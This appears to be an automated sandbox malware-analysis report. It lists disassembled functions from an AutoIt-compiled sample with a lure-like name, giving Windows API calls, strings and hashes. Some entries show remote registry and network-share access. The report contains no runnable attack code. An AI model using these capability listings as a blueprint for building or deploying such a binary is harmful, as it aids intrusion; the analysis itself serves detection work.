                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: 55fa664f6448210c4e6b94723b00ffa5a48201cf15c02996792e81ffdf9068b4
                                                        • Instruction ID: 83594580fa1cf43a4b224318f7510c2ed97fe555d86737c6447ae5ef0a7b7372
                                                        • Opcode Fuzzy Hash: 55fa664f6448210c4e6b94723b00ffa5a48201cf15c02996792e81ffdf9068b4
                                                        • Instruction Fuzzy Hash: 46026A30108345DFC724EF24C885AAEBBE5FF98314F10491DF596972A2DA39E989CB52
                                                        Function 00822D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00822DDD
                                                        • GetMenuItemCount.USER32(00885890), ref: 00822E66
                                                        • DeleteMenu.USER32(00885890,00000005,00000000,000000F5,?,?), ref: 00822EF6
                                                        • DeleteMenu.USER32(00885890,00000004,00000000), ref: 00822EFE
                                                        • DeleteMenu.USER32(00885890,00000006,00000000), ref: 00822F06
                                                        • DeleteMenu.USER32(00885890,00000003,00000000), ref: 00822F0E
                                                        • GetMenuItemCount.USER32(00885890), ref: 00822F16
                                                        • SetMenuItemInfoW.USER32(00885890,00000004,00000000,00000030), ref: 00822F4C
                                                        • GetCursorPos.USER32(?), ref: 00822F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 00822F5F
                                                        • TrackPopupMenuEx.USER32(00885890,00000000,?,00000000,00000000,00000000), ref: 00822F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00822F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: d423b550202695696b7019ea7380935f3d14581ad7ca1ebaa9b022c62bf42b88
                                                        • Instruction ID: b1203c5701146eb6c7bf19a06aa99134b8852e0a9a43633a2b48541699388ae2
                                                        • Opcode Fuzzy Hash: d423b550202695696b7019ea7380935f3d14581ad7ca1ebaa9b022c62bf42b88
                                                        • Instruction Fuzzy Hash: 7E71E774600229BFEB218F58EC45FAABF64FF05364F14421AF625E61E2CBB15CA0D791
                                                        Function 008177DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • _memset.LIBCMT ref: 0081786B
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008178A0
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008178BC
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008178D8
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00817902
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0081792A
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00817935
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0081793A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: fc36c3bc300c20314e03b17b8c8bb656bfacb3ce0183dfd053c9ab792bcd32fa
                                                        • Instruction ID: fe0add8e014dccb940229317989e78044a1b6676e1220adfc93725fba002bb89
                                                        • Opcode Fuzzy Hash: fc36c3bc300c20314e03b17b8c8bb656bfacb3ce0183dfd053c9ab792bcd32fa
                                                        • Instruction Fuzzy Hash: 8B412872C14229EACB25EBA4DC49EEDB778FF04310F00406DE905A3161DB359D44CF90
                                                        Function 00840E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: ae2adfa92256419305e7193616b88b7e9fc84734f77ecdeef14b88a3cc347593
                                                        • Instruction ID: d8b5c1498859b0faa10212dc0fb369734c4eee380311f5ef0d1dc454588b7a64
                                                        • Opcode Fuzzy Hash: ae2adfa92256419305e7193616b88b7e9fc84734f77ecdeef14b88a3cc347593
                                                        • Instruction Fuzzy Hash: 0241273210024ECBCF10EF50D859AEF3764FF15304F548468FE959B296DB78A99ACBA0
                                                        Function 00847152 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0084716A
                                                        • CreateMenu.USER32 ref: 00847185
                                                        • SetMenu.USER32(?,00000000), ref: 00847194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00847221
                                                        • IsMenu.USER32(?), ref: 00847237
                                                        • CreatePopupMenu.USER32 ref: 00847241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0084726E
                                                        • DrawMenuBar.USER32 ref: 00847276
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$0R$F
                                                        • API String ID: 176399719-275108604
                                                        • Opcode ID: 9371a3d47bfcf16db7f4b4f5adc67aeab8630b566f388e47372eb329c94b4bda
                                                        • Instruction ID: 2f83ee04dfd248d06bef2a1d37b14754d8d39348e7ca0b84c46452f2d986ed5e
                                                        • Opcode Fuzzy Hash: 9371a3d47bfcf16db7f4b4f5adc67aeab8630b566f388e47372eb329c94b4bda
                                                        • Instruction Fuzzy Hash: F7416778A01219EFEB20DFA4D884E9A7BB5FF09310F154529FA06E7361D771A910CB90
                                                        Function 0081F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007FE2A0,00000010,?,Bad directive syntax error,0084F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0081F7C2
                                                        • LoadStringW.USER32(00000000,?,007FE2A0,00000010), ref: 0081F7C9
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • _wprintf.LIBCMT ref: 0081F7FC
                                                        • __swprintf.LIBCMT ref: 0081F81E
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0081F88D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1506413516-4153970271
                                                        • Opcode ID: da9c2e061550522caa92c7a6cc40dd5e99fe149b52650a72cff783f7a56537e6
                                                        • Instruction ID: bd5f11cbf69e388c856d10d1a8b89b60ae8d11cdc816012fea80b6ce0e9155d5
                                                        • Opcode Fuzzy Hash: da9c2e061550522caa92c7a6cc40dd5e99fe149b52650a72cff783f7a56537e6
                                                        • Instruction Fuzzy Hash: 9221613194021EEBCF15EF90CC0EFED7739FF28310F044469B519A61A2EA75A654DB60
                                                        Function 008252C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                          • Part of subcall function 007C7924: _memmove.LIBCMT ref: 007C79AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00825330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00825346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00825357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00825369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0082537A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: dbe695a2a6f25f8e12ed9cd19ea2fab300774f7a73ba8b8d9b34b30102380085
                                                        • Instruction ID: f7cdc623cc0f7ddf00a5d4dbe07d40632f117a9595002db66a4065dbf8a05670
                                                        • Opcode Fuzzy Hash: dbe695a2a6f25f8e12ed9cd19ea2fab300774f7a73ba8b8d9b34b30102380085
                                                        • Instruction Fuzzy Hash: 9411B120A90169B9D724B661DC4EEFF6BBCFBA2B84F00041DB415E21D1DDB45C44C960
                                                        Function 008246B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 28fd554d56a90fea7c429afdf9be35683d0c718789af3a0548bc37e7dfd83475
                                                        • Instruction ID: 750975130a4aad92f5b0ff2f2eb44441631035dca057eb02db357b6f21d5a71a
                                                        • Opcode Fuzzy Hash: 28fd554d56a90fea7c429afdf9be35683d0c718789af3a0548bc37e7dfd83475
                                                        • Instruction Fuzzy Hash: 8F11D535501128BFDB10AB70AC4AEEA77BCFB06711F0401BAF555D6192EF789EC1CA60
                                                        Function 00824F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00824F7A
                                                          • Part of subcall function 007E049F: timeGetTime.WINMM(?,75C0B400,007D0E7B), ref: 007E04A3
                                                        • Sleep.KERNEL32(0000000A), ref: 00824FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00824FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00824FEC
                                                        • SetActiveWindow.USER32 ref: 0082500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00825019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00825038
                                                        • Sleep.KERNEL32(000000FA), ref: 00825043
                                                        • IsWindow.USER32 ref: 0082504F
                                                        • EndDialog.USER32(00000000), ref: 00825060
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 0abf5a81b4fe50623a1662d27da896ca7d097f0f057b8b8c74dcf67b712ceac8
                                                        • Instruction ID: bcc72a92d89cdee9f71ee27fd315667f3ee405833344d3cea8c49d34c8524276
                                                        • Opcode Fuzzy Hash: 0abf5a81b4fe50623a1662d27da896ca7d097f0f057b8b8c74dcf67b712ceac8
                                                        • Instruction Fuzzy Hash: 9221C374240605EFE7109F68FD88A263B69FB5A745F051028F205C21B2EF718D90D772
                                                        Function 0082D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • CoInitialize.OLE32(00000000), ref: 0082D5EA
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0082D67D
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0082D691
                                                        • CoCreateInstance.OLE32(00852D7C,00000000,00000001,00878C1C,?), ref: 0082D6DD
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0082D74C
                                                        • CoTaskMemFree.OLE32(?,?), ref: 0082D7A4
                                                        • _memset.LIBCMT ref: 0082D7E1
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0082D81D
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0082D840
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0082D847
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0082D87E
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0082D880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: 4239bc4d7d41752ad4e00838d5dac1320c83557685e2c03d39b909832d0acb61
                                                        • Instruction ID: 19c2de25c3402659750dbd4f7ab87a4f521d2dcfd6f36dc94ac3233c2aafe911
                                                        • Opcode Fuzzy Hash: 4239bc4d7d41752ad4e00838d5dac1320c83557685e2c03d39b909832d0acb61
                                                        • Instruction Fuzzy Hash: 79B1FC75A00219EFDB04DFA4D888EAEBBB9FF49314B148469F909DB251DB34ED41CB50
                                                        Function 0081C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0081C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0081C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0081C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0081C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0081C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0081C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0081C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0081C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0081C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0081C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0081C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0081C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 54e3531429b4cd40c12ebb4182d5349d40a479728368b3fe763e587caf1fcf31
                                                        • Instruction ID: 5aeb7b107431e663f15185d08be2da7a872e1dee4cd273a8f222023c7b20fa08
                                                        • Opcode Fuzzy Hash: 54e3531429b4cd40c12ebb4182d5349d40a479728368b3fe763e587caf1fcf31
                                                        • Instruction Fuzzy Hash: 14513C75B40205AFDB18CFA9DD89AAEBBBAFF98310F14812DF619D6291D7709D40CB10
                                                        Function 0082A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,0084F910), ref: 0082A90B
                                                        • GetDriveTypeW.KERNEL32(00000061,008789A0,00000061), ref: 0082A9D5
                                                        • _wcscpy.LIBCMT ref: 0082A9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 4ec0d0c867ebb4d7cd608ac96e58504dc3002f14d5a4eb38a4e54b5c1811553b
                                                        • Instruction ID: 989f3ea6e4269a9fb9cf6e470c582c1f6f1c0dd2c21382c4f7b87abb09e4a6ae
                                                        • Opcode Fuzzy Hash: 4ec0d0c867ebb4d7cd608ac96e58504dc3002f14d5a4eb38a4e54b5c1811553b
                                                        • Instruction Fuzzy Hash: 07519E31108311DFC308EF15D89ABAEBBA5FF84304F10482DF69697292DB71D989CA93
                                                        Function 00848645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008486FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: 0R
                                                        • API String ID: 634782764-1916035689
                                                        • Opcode ID: b5e6bba73d15202a7793508c7a55feeeff5c394b921127b898752ea302da0df9
                                                        • Instruction ID: d0259d403821612e34477809fdaa5d38238820039ff8c4a7f06f6e12b99dbf38
                                                        • Opcode Fuzzy Hash: b5e6bba73d15202a7793508c7a55feeeff5c394b921127b898752ea302da0df9
                                                        • Instruction Fuzzy Hash: 8551B33050024CFFEF209B28CC89FAD7BA4FB15764F61412AFA15E61A1DF76A980DB51
                                                        Function 007C9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: 4c370b9f32ba8364654e344eb7f59e9db7e65146e3ec5ac37a5c9288482c8bce
                                                        • Instruction ID: c740b3de4e129a6135e1795ba34b6afc2d4cd8c459007f2aaf35a47745853d0f
                                                        • Opcode Fuzzy Hash: 4c370b9f32ba8364654e344eb7f59e9db7e65146e3ec5ac37a5c9288482c8bce
                                                        • Instruction Fuzzy Hash: 1F41B471600209EEEB24DF35D84AE7A73E8FF09300F2044AEE649D7391EE7999418B11
                                                        Function 008474BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0084755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00847565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00847578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00847580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0084758B
                                                        • DeleteDC.GDI32(00000000), ref: 00847594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0084759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008475B2
